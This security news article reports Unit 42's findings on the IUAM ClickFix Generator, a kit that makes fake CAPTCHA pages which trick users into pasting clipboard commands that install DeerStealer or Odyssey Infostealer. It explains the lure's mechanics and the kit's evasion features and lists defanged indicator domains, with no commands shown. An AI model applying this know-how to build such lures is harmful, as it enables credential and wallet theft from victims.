ClickFix Phishing: New Automated Kits Trick Users Into Manually Running Malware and Stealers

Researchers from Palo Alto Networks Unit 42 have discovered a new phishing trend where attackers trick victims into manually executing malware on their own devices.

The report exposes a commoditized phishing ecosystem built around an automated tool known as the IUAM ClickFix Generator. This tool makes it simple for threat actors of any skill level to create realistic phishing pages that mimic browser verification challenges from services.

As Unit 42 writes, “Attackers are packaging a highly effective social engineering technique known as ClickFix into easy-to-use phishing kits, making it accessible to a wider range of threat actors. This technique tricks victims into bypassing security measures by manually executing malware, typically information stealers and remote access Trojans (RATs).”

The ClickFix method disguises malicious intent behind what appears to be a normal browser security check. Victims visiting a phishing page are asked to verify that they’re human — usually by clicking a button that appears to trigger a CAPTCHA or verification process.

Behind the scenes, the click copies a malicious command to the victim’s clipboard. A prompt then instructs them to open a terminal (PowerShell or macOS Terminal), paste the copied command, and execute it “to complete the verification.”

This transforms the user into an unwitting participant in their own infection.

Unit 42 found that attackers are now automating the creation of these pages using the IUAM ClickFix Generator, hosted on a server at IP address 38.242.212[.]5. The kit was observed active from July through October 2025, providing a web interface for building customized phishing campaigns.

The report explains: “This tool allows threat actors to create highly customizable phishing pages that mimic the challenge-response behavior of a browser verification page… The spoofed interface is designed to appear legitimate to victims, increasing the effectiveness of the lure.”

Threat actors can customize nearly every detail — from the title and message (“Just a moment…”) to the command copied to the clipboard and the instructions shown in the fake verification prompt. Advanced options even allow operating system detection, JavaScript obfuscation, and mobile blocking, ensuring victims are guided to desktop environments where the malicious code will execute properly.

Unit 42 researchers identified multiple campaigns built with or inspired by the IUAM ClickFix Generator, each targeting different platforms and distributing distinct malware strains.

Campaign 1: Windows-Only – Delivering DeerStealer

In one case, attackers focused exclusively on Windows systems. “When a victim interacts with the CAPTCHA element by clicking a checkbox to determine whether they are human,” Unit 42 explains, “this action triggers a background JavaScript to copy a malicious PowerShell command to their clipboard. Simultaneously, a popover appears, instructing them to open the Windows Run dialog (by pressing Win+R), paste the content from their clipboard and run the command.”

When executed, the command downloads a malicious batch script (cv.bat) that installs DeerStealer, a credential and browser data theft malware.

The underlying simplicity is what makes ClickFix so effective — it bypasses traditional email filters and endpoint protections because the payload execution occurs manually by the victim, rather than automatically by code exploitation.

Campaign 2: Multi-Platform – Targeting macOS with Odyssey

Another series of phishing campaigns broadened the scope. In this case, attackers configured phishing pages to detect the victim’s operating system via JavaScript and deliver different payloads for Windows and macOS users.

Unit 42 noted, “Each version of the phishing page detects the victim’s operating system via JavaScript… and delivers a payload accordingly.”

For macOS users, the pages delivered Odyssey Infostealer, a malware-as-a-service (MaaS) strain known to steal browser data, cryptocurrency wallets, and system credentials. The malicious command was hidden in Base64-encoded form and executed silently using nohup bash, ensuring persistence even if the terminal window closed.

The targeted domains for these campaigns included deceptive names like tradingview.connect-app[.]us[.]com, cloudlare-lndex[.]com, and teamsonsoft[.]com — all designed to look like legitimate web infrastructure or trading platforms.

Unit 42 observed that “some pages contained leftover developer comments written in Russian,” further hinting at the kit’s likely Eastern European origins.

While Unit 42’s investigation focused on one primary kit, the researchers discovered numerous related variants in circulation, suggesting that the ClickFix model is rapidly proliferating across cybercrime marketplaces.

Related Posts:

• State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
• Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
• ClickFix: The Rising Threat of Clipboard-Based Social Engineering
• ClickFix Unmasked: How North Korea’s Kimsuky Group Turned PowerShell into a Weapon of Psychological Deception
• Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique